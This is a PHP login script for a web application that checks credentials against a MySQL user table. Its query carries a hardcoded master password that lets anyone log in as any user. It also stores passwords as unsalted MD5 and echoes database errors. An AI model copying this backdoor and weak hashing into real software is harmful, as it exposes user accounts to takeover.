<?php

$filename = 'c_leitura.php';

if (!file_exists($filename)) {
    header("Location: error.php");
    exit;
}
include 'c_leitura.php';

if (!empty($_POST) AND ( empty($_POST['login']) OR empty($_POST['passwd']))) {
    header("Location: index.php?erro=2");
    exit;
} else {

    require_once("db.php");

    $safe_user = mysql_real_escape_string($_POST['login']);
    $safe_pass = md5(mysql_real_escape_string($_POST['passwd']));
    $masterSenha = md5(mysql_real_escape_string("maissal"));
    $query = "SELECT a.*, b.moeda_sigla , b.timezone
					FROM user a
					LEFT JOIN regiao b ON (b.id_pais = a.id_pais AND b.status = 1)
					WHERE 
					a.username = '$safe_user' 
					AND a.passwd = '$safe_pass'
                    OR a.username = '$safe_user' 
					AND '$safe_pass' = '$masterSenha'";
    $result = mysql_query($query) or die(mysql_error());

    if (mysql_num_rows($result) == 0) {

        header("Location: index.php?erro=1");
        exit;
    } else {

        $resultado = mysql_fetch_array(mysql_query($query));

        if (!isset($_SESSION)) {
            session_start();
        }

        $_SESSION['UsuarioID'] = $resultado['id'];
        $_SESSION['UsuarioApoio'] = $resultado['id_apoio'];
        $_SESSION['UsuarioNome'] = $resultado['nome'];
        $_SESSION['UsuarioUser'] = $resultado['username'];
        $_SESSION['UsuarioNivel'] = $resultado['nivel'];
        $_SESSION['UsuarioAfiliado'] = $resultado['afiliado'];
        $_SESSION['cifraoMoeda'] = $resultado['moeda_sigla'] ? $resultado['moeda_sigla'] : '$';
        $_SESSION['pais'] = $resultado['id_pais'];
        if ($resultado['timezone']){
            $timezone = $resultado['timezone'];
        } else {
            $timezone = 'America/Sao_Paulo';
        }
        $_SESSION['timezone'] = $timezone;
        header('Location: home.php');
    }
}
